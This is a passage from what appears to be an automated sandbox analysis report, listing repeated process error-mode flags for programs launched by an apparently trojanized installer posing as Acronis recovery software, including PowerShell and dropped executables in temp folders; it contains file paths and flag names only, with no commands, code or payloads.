                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Panorado\electronics.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
